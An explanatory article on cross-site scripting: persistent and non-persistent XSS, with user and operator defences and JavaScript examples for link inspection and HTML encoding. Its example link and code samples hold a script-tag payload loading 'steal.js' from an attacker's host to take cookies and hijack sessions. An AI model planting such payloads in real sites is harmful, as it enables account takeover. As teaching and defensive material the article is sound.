What is Cross Site Scripting?
Cross Site Scripting is a technique used to inject malicious client-side script into web pages that are viewed by other users. It is a very common type of attack on web applications, and it collects data from their users.
Cross site scripting is referred to as XSS.
In an XSS attack, the attacker typically inserts malicious code into a link that appears to come from a trustworthy source.
These links contain malicious code meant to steal the cookie or hijack the session. When someone clicks such a link, the embedded code is submitted as part of the client's web request and executes on the user's computer, which allows the attacker to steal or poison (alter) the cookie, or to take other information from the user's computer.
How the Cross Site Scripting (XSS) Attack Works
In an XSS attack, the attacker usually injects JavaScript, VBScript, ActiveX, HTML, or Flash into a vulnerable application to fool a user and get data from them. Everything from account hijacking, changing of user settings, and cookie theft/poisoning to false advertising is possible, and new malicious uses of XSS are found every now and then. You have most probably seen a link containing a malicious XSS script in forums where users can send messages to other members, and in your mailbox too.
Example of an XSS attack.
Suppose there is a person named Charlie who visits a website regularly. One day Mr. X visits that website and finds out that it is vulnerable to XSS attack. He creates a URL that contains malicious code and sends it to other members by message or comment, for example:
http://website.com?q=anything<script src="http://Mr.X website.com/steal.js">
When Charlie clicks on this link, on the front end he is directed to a search for the term "anything" on that website, whereas on the back end steal.js is working on the client computer, stealing information and sending it to Mr. X's server. From there Mr. X retrieves that information and uses it as he wants. He can also steal Charlie's cookie and save it on his own computer; by using that cookie he can log on to the website as Charlie.
Types of XSS attacks
There is no fixed set of attack types in Cross Site Scripting (XSS), because new types of XSS attack pop up every day. But according to some experts there are two types of Cross Site Scripting attacks:
1. Persistent
2. Non-Persistent
Persistent
In a persistent Cross Site Scripting (XSS) vulnerability, the data introduced by the attacker is saved on the server and then permanently displayed on the pages generated by the server. An example of this is an online message board where users are allowed to post HTML-formatted messages for other users to read. This type of vulnerability is very dangerous because it can be found on social networking sites, and through these sites it can propagate very fast.
Non Persistent
The non-persistent XSS vulnerability is the most common type. Most of the time it is present in websites that accept data from the user, most commonly in HTML forms, where this data is immediately used by server-side scripts to parse and display a page of results for the user before the data has been properly sanitized.
How to reduce the Threat of XSS attack
To be safe from XSS attacks, follow only the links you trust, so that there is no chance of a cross site scripting attack. While checking mail, turn off JavaScript so that a malicious script has no chance of executing on the client side.
Click only links that go straight to a web address; most importantly, the link should not contain a script tag. Most attackers encode the link in another format such as hex, so remember that a link you click should be simple: straight to a web address, with no extra tags.
If you are searching for information on a forum, it is better to use a search engine. Finding information through a search engine is safer than searching for it on various forums.
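The advice above about hex-encoded links can be checked mechanically by decoding a link before judging it. The following is an added example, not code from the original article; the function names and the sample links (with placeholder hosts) are constructed for illustration.

```javascript
// Added example; function names and sample links are constructed for illustration.
// Matches the start of an HTML tag such as <script ...> or </a>.
const TAG = /<\s*\/?\s*[a-z]/i;

// Percent-decode repeatedly so that %3C and double-encoded %253C both end up as "<".
function fullyDecode(text, maxRounds = 5) {
  let current = text;
  for (let i = 0; i < maxRounds; i++) {
    let next;
    try {
      next = decodeURIComponent(current);
    } catch (err) {
      return current; // malformed escape sequence: inspect what was decoded so far
    }
    if (next === current) break;
    current = next;
  }
  return current;
}

// Report whether a link carries markup, and whether encoding was hiding it.
function inspectLink(link) {
  const decoded = fullyDecode(link);
  const suspicious = TAG.test(decoded);
  return { decoded, suspicious, hiddenByEncoding: suspicious && !TAG.test(link) };
}

// Constructed sample links (hosts are placeholders).
const SAMPLE_LINKS = [
  "http://website.example/?q=anything",
  "http://website.example/?q=anything%3Cscript%20src%3D%22http%3A%2F%2Fattacker.example%2Fsteal.js%22%3E",
  "http://website.example/?q=anything%253Cscript%253E",
];

function scanSamples() {
  return SAMPLE_LINKS.map((link) => inspectLink(link));
}

for (const result of scanSamples()) {
  console.log(result.suspicious ? "SUSPICIOUS" : "ok", result.hiddenByEncoding ? "(encoded)" : "", result.decoded);
}
```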
These are things that you can do as a client. But if you are a web application operator you can do more to stop XSS attacks, such as:
Never trust user input; always sanitize user-provided data.
Use HTML entities in place of special characters: in place of < and > use &lt; and &gt;, translate ( and ) to &#40; and &#41;, " to &#34;, ' to &#39;, and also # and & to &#35; (#) and &#38; (&). This helps to reduce the attacker's options for introducing malicious code, and the majority of cross site scripting attacks will be eliminated.
By using escaping and encoding we can create a major defense against cross site scripting attacks.
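The character translation listed above, applied at output time to both the non-persistent case (a search term echoed into a results page) and the persistent case (stored comments). This is an added example, not code from the original article; the function names and the sample search term are constructed for illustration.

```javascript
// Added example; function names and sample data are constructed for illustration.
// Character-to-entity map following the list in the article.
const ENTITIES = {
  "&": "&#38;", "<": "&lt;", ">": "&gt;", '"': "&#34;", "'": "&#39;",
  "(": "&#40;", ")": "&#41;", "#": "&#35;",
};

// One pass over the input, so the "&" and "#" inside an emitted entity
// are never encoded a second time.
// Suitable for HTML body text and quoted attribute values only; values placed
// inside <script> blocks or URLs need encoding rules for those contexts.
function encodeForHtml(value) {
  return String(value).replace(/[&<>"'()#]/g, (ch) => ENTITIES[ch]);
}

// Non-persistent case, vulnerable form: the term is echoed as-is.
function renderSearchUnsafe(term) {
  return "<p>Results for: " + term + "</p>";
}

// Non-persistent case, corrected form: the term is encoded on output.
function renderSearchSafe(term) {
  return "<p>Results for: " + encodeForHtml(term) + "</p>";
}

// Persistent case: stored comments are encoded every time they are rendered,
// regardless of what was accepted when they were saved.
function renderComments(comments) {
  return "<ul>" + comments.map((c) => "<li>" + encodeForHtml(c) + "</li>").join("") + "</ul>";
}

// Constructed sample input modelled on the q= value in the article's example link.
const SAMPLE_TERM = 'anything<script src="http://attacker.example/steal.js"></script>';

console.log(renderSearchUnsafe(SAMPLE_TERM)); // script tag reaches the browser intact
console.log(renderSearchSafe(SAMPLE_TERM));   // script tag is shown as inert text
console.log(renderComments(["nice post", SAMPLE_TERM]));
```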
XSS holes are the most common type of security vulnerability; they have been present since the late 90's and are getting more popular among hackers day by day. Until 5 to 6 years ago, most of the major websites of the world had one or another type of XSS vulnerability, and most social networking sites, such as Facebook, Twitter, MySpace and YouTube, also had some type of XSS flaw. They all contained XSS flaws in their websites, but now they are good, or say safe. Still, as you know, every day XSS attackers try to find new ways to get information from users by fooling them into clicking on a link the attacker has created.